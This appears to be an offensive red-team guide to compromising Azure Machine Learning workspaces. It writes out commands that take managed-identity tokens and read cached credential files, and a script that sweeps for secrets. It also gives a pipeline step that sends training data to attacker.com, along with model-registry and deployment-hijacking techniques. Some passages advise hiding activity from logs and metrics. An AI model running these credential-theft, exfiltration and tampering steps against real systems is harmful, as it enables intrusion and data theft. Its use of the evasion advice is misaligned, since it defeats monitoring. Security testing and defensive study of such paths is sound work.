Azure ML Exploitation
Red team attack methodology for Azure Machine Learning: workspace security, compute instance attacks, pipeline poisoning, model registry tampering, and data store exploitation.
Azure ML Exploitation
Azure Machine Learning is Microsoft's enterprise ML platform providing managed compute, experimentation tracking, automated ML, model deployment, and MLOps pipelines. From a red team perspective, Azure ML workspaces are high-value targets because they aggregate access to sensitive data, trained models, compute resources, and credentials for external services. A compromised workspace often provides paths to both the ML pipeline and the broader Azure environment.
Workspace Security
Workspace Architecture
An Azure ML workspace is associated with several dependent Azure resources:
| Resource | Purpose | Attack Relevance |
|---|---|---|
| Azure Storage Account | Default data store for experiments, models, snapshots | Training data access, model artifact theft |
| Azure Key Vault | Credential storage for workspace secrets | API keys, connection strings, certificates |
| Azure Container Registry | Docker images for training and deployment | Container image tampering, supply chain attacks |
| Application Insights | Telemetry and monitoring | Log access, operational intelligence |
# Get workspace details and associated resources
az ml workspace show --name <ws> --resource-group <rg> \
--query "{storage:storage_account, keyVault:key_vault, acr:container_registry}"
# List workspace connections (may contain credentials)
az ml connection list --workspace-name <ws> --resource-group <rg>

RBAC Exploitation
Azure ML uses several built-in roles with different privilege levels:
| Role | Capabilities | Red Team Interest |
|---|---|---|
| AzureML Data Scientist | Run experiments, deploy models, access compute | Training pipeline access, model deployment |
| AzureML Compute Operator | Manage compute resources | Create compute for credential theft |
| Contributor on workspace | Full workspace management | All workspace operations including connections |
| Reader on workspace | View workspace contents | Enumerate assets, view experiment logs |
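The role boundaries above determine which attack paths a compromised principal supports; a minimal sketch of capability checking (the role-to-action map is illustrative, not the real Azure RBAC action list):

```python
# Illustrative subset of Azure ML role capabilities (NOT the real RBAC action list)
ROLE_ACTIONS = {
    "AzureML Data Scientist": {"run_experiment", "deploy_model", "use_compute"},
    "AzureML Compute Operator": {"create_compute", "delete_compute", "use_compute"},
    "Contributor": {"run_experiment", "deploy_model", "use_compute",
                    "create_compute", "delete_compute", "manage_connections"},
    "Reader": {"list_assets", "view_logs"},
}

def can(role, action):
    """Return True if the given role permits the action in this simplified model."""
    return action in ROLE_ACTIONS.get(role, set())

# A Data Scientist can deploy models but cannot manage workspace connections
print(can("AzureML Data Scientist", "deploy_model"))        # True
print(can("AzureML Data Scientist", "manage_connections"))  # False
```

Mapping the actions you need against the role you hold tells you early whether an objective (e.g. reading connection credentials) requires escalating to Contributor first.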
Compute Instance Attacks
Compute as a Pivot Point
Azure ML compute instances are managed VMs with Jupyter, VS Code, and terminal access. They function similarly to SageMaker notebook instances as pivot points for lateral movement.
# List compute instances
az ml compute list --workspace-name <ws> --resource-group <rg> --type ComputeInstance
# Get compute details
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg>
# Access via workspace (creates access URL)
# Navigate to Azure ML Studio > Compute > Instances > Connect

Credential Harvesting
From a compromised compute instance:
# Managed identity token for Azure management
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Managed identity token for storage access
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"
# Check for cached Azure CLI credentials
cat ~/.azure/accessTokens.json 2>/dev/null
cat ~/.azure/msal_token_cache.json 2>/dev/null
# Check environment variables for credentials
env | grep -i -E "(key|secret|password|token|connection)"
# Check for Git credentials (common on data science instances)
cat ~/.git-credentials 2>/dev/null
git config --global credential.helper

Startup Script Attacks
Azure ML compute instances support setup scripts that run on creation. If modifiable, these scripts provide persistence:
# Check if the compute has a setup script
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg> \
--query "setup_scripts"Shared Compute Risks
When multiple data scientists share a workspace, compute instances may be accessible to other workspace users depending on configuration:
- SSH access: If SSH is enabled, other workspace users with the SSH key can access the instance
- Shared file systems: Workspace-level file shares may be mounted across compute instances
- Terminal access: Workspace contributors can access terminal sessions on any compute instance in the workspace
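The manual credential checks earlier in this section can be consolidated into one sweep; a minimal standard-library sketch (the file list and name pattern mirror the shell commands above):

```python
import os
import re
from pathlib import Path

# Environment variable names that commonly carry secrets (same pattern as the grep above)
CRED_PATTERN = re.compile(r"(key|secret|password|token|connection)", re.IGNORECASE)

# Credential files commonly present on data science compute instances
CRED_FILES = [
    "~/.azure/accessTokens.json",
    "~/.azure/msal_token_cache.json",
    "~/.git-credentials",
]

def sweep(environ):
    """Return candidate credential env vars and credential files that exist on disk."""
    env_hits = [name for name in environ if CRED_PATTERN.search(name)]
    file_hits = [p for p in CRED_FILES if Path(p).expanduser().exists()]
    return {"env": env_hits, "files": file_hits}

findings = sweep(dict(os.environ))
print(findings)
```

Running one script instead of several interactive commands also reduces the number of distinct shell events written to session logs.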
Pipeline Poisoning
Pipeline Architecture
Azure ML pipelines define multi-step ML workflows: data preprocessing, feature engineering, model training, evaluation, and deployment. Pipelines are defined as code (Python SDK or YAML) and executed on workspace compute.
Attack Vectors
Pipeline definition tampering
Modify pipeline definitions to inject malicious steps. If pipeline code is stored in a connected Git repository, compromise the repository to modify pipeline logic.
# Injected pipeline step that exfiltrates training data
- name: exfiltrate_data
  command: >
    curl -X POST https://attacker.com/collect -d @${{inputs.training_data}}
  environment: azureml:default-env:1
  compute: azureml:cpu-cluster

Environment manipulation
Azure ML environments define the software dependencies for pipeline steps. Tampering with environment definitions allows dependency injection:
# List environments
az ml environment list --workspace-name <ws> --resource-group <rg>
# Register a modified environment with malicious packages
az ml environment create --file modified-env.yml \
--workspace-name <ws> --resource-group <rg>

Component substitution
Azure ML pipelines use reusable components. Registering a malicious component with the same name (but a newer version) causes pipelines to pick up the tampered version on their next execution.
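Why same-name substitution works can be seen in how unpinned component references resolve; a minimal sketch of latest-version resolution (the registry dict is illustrative, not the Azure ML API):

```python
# Illustrative component registry: name -> {version: artifact digest}
registry = {
    "preprocess": {"1": "sha256:aaa...", "2": "sha256:bbb..."},
}

def resolve(name, version=None):
    """Resolve a component reference; an unpinned reference takes the highest version."""
    versions = registry[name]
    if version is None:  # unpinned: picks up whatever was registered last
        version = max(versions, key=int)
    return versions[version]

# Attacker registers a tampered version 3 under the same component name
registry["preprocess"]["3"] = "sha256:evil..."

print(resolve("preprocess"))       # unpinned pipelines now get the tampered artifact
print(resolve("preprocess", "2"))  # pinned pipelines still get the original
```

The sketch also shows the defensive corollary: pipelines that pin exact component versions (and verify artifact digests) are not silently redirected by a new registration.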
Schedule manipulation
Pipelines can run on schedules. Modifying a schedule to trigger a poisoned pipeline at a specific time allows timed attacks:
# List schedules
az ml schedule list --workspace-name <ws> --resource-group <rg>
Model Registry Tampering
Registry Structure
The Azure ML model registry stores model versions with metadata, lineage tracking, and deployment state. It serves as the source of truth for which model versions are deployed to production endpoints.
# List registered models
az ml model list --workspace-name <ws> --resource-group <rg>
# Get model details including artifact location
az ml model show --name <model> --version <ver> \
--workspace-name <ws> --resource-group <rg>

Tampering Techniques
| Technique | Method | Impact |
|---|---|---|
| Version injection | Register a new version of an existing model with tampered artifacts | Next deployment picks up backdoored model |
| Artifact replacement | Modify model files in the backing storage account | Deployed model serves attacker-controlled predictions |
| Metadata manipulation | Change model tags or properties to influence selection | Automated pipelines deploy the wrong model |
| Lineage spoofing | Register models with fabricated experiment lineage | Bypass provenance checks |
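The metadata-manipulation row above abuses automated selection logic; a minimal sketch of tag-driven model selection (the model records and selection function are illustrative):

```python
# Illustrative registry entries: automated deployment picks the model tagged stage=production
models = [
    {"name": "fraud-detector", "version": 7, "tags": {"stage": "production"}},
    {"name": "fraud-detector", "version": 8, "tags": {"stage": "staging"}},
]

def select_for_deployment(models):
    """Return the model an automated pipeline would deploy, based on tags alone."""
    candidates = [m for m in models if m["tags"].get("stage") == "production"]
    return max(candidates, key=lambda m: m["version"])

print(select_for_deployment(models)["version"])  # 7

# Attacker with registry write access flips the tag on an unvetted version
models[1]["tags"]["stage"] = "production"
print(select_for_deployment(models)["version"])  # 8: one tag change redirected deployment
```

No model artifact was touched, which is why tag or property changes are easy to miss in artifact-focused integrity reviews.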
Deployment Hijacking
Azure ML supports managed online endpoints (fully managed) and Kubernetes online endpoints (customer-managed AKS):
# List online endpoints
az ml online-endpoint list --workspace-name <ws> --resource-group <rg>
# Get endpoint details
az ml online-endpoint show --name <endpoint> \
--workspace-name <ws> --resource-group <rg>
# List deployments within an endpoint
az ml online-deployment list --endpoint-name <endpoint> \
--workspace-name <ws> --resource-group <rg>

Deployment hijacking: update an existing deployment to point to a tampered model version, or modify traffic routing to send requests to an attacker-controlled deployment.
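The traffic-routing variant comes down to rewriting the endpoint's percentage split; a minimal sketch of the effect (the traffic dict mirrors Azure ML's percentage-based routing, but the routing function itself is illustrative):

```python
import random

# Percentage-based traffic split across deployments behind one endpoint
traffic = {"blue": 100, "attacker-deploy": 0}

def route(traffic, rng):
    """Pick a deployment for one request according to the traffic split."""
    roll = rng.uniform(0, 100)
    cumulative = 0
    for deployment, pct in traffic.items():
        cumulative += pct
        if roll < cumulative:
            return deployment
    return deployment  # fallback for roll == 100

# Hijack: shift a slice of traffic to the attacker-controlled deployment
traffic.update({"blue": 90, "attacker-deploy": 10})

rng = random.Random(0)
hits = sum(route(traffic, rng) == "attacker-deploy" for _ in range(10_000))
print(f"{hits / 100:.1f}% of requests reached the attacker deployment")
```

Keeping the hijacked slice small (here 10%) samples live requests and responses while leaving aggregate endpoint metrics close to baseline.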
Data Store Exploitation
Data Store Architecture
Azure ML data stores are abstractions over Azure storage services. They store credentials or use managed identity to access underlying storage:
# List data stores
az ml datastore list --workspace-name <ws> --resource-group <rg>
# Get data store details (may reveal storage account names, container names)
az ml datastore show --name <datastore> \
--workspace-name <ws> --resource-group <rg>

Credential Extraction
Data stores can authenticate using:
- Account keys: Stored in the workspace Key Vault
- SAS tokens: Time-limited but may have broad scope
- Managed identity: Workspace identity with storage access
- Service principal: Application credentials stored in Key Vault
# Access Key Vault secrets (if workspace identity or user has access)
az keyvault secret list --vault-name <vault>
az keyvault secret show --vault-name <vault> --name <secret>

Data Access Through Workspace Identity
The workspace's managed identity typically has Storage Blob Data Contributor or Storage Blob Data Reader on connected storage accounts. From a compromised compute instance:
from azure.identity import ManagedIdentityCredential
from azure.storage.blob import BlobServiceClient
credential = ManagedIdentityCredential()
blob_service = BlobServiceClient(
    account_url="https://<storage>.blob.core.windows.net",
    credential=credential
)

# List containers and blobs
for container in blob_service.list_containers():
    print(f"Container: {container.name}")
    container_client = blob_service.get_container_client(container.name)
    for blob in container_client.list_blobs():
        print(f"  Blob: {blob.name}")

Related Topics
- Azure AI Services Overview -- Service landscape and enumeration
- Azure OpenAI Attack Surface -- Azure OpenAI-specific attacks
- Defender for AI Bypass -- Evading detection during exploitation
- SageMaker Exploitation -- Comparable AWS ML platform attacks
References
- Azure ML Security -- Enterprise security documentation
- Azure ML RBAC -- Role-based access control
- Azure ML Data Stores -- Data store configuration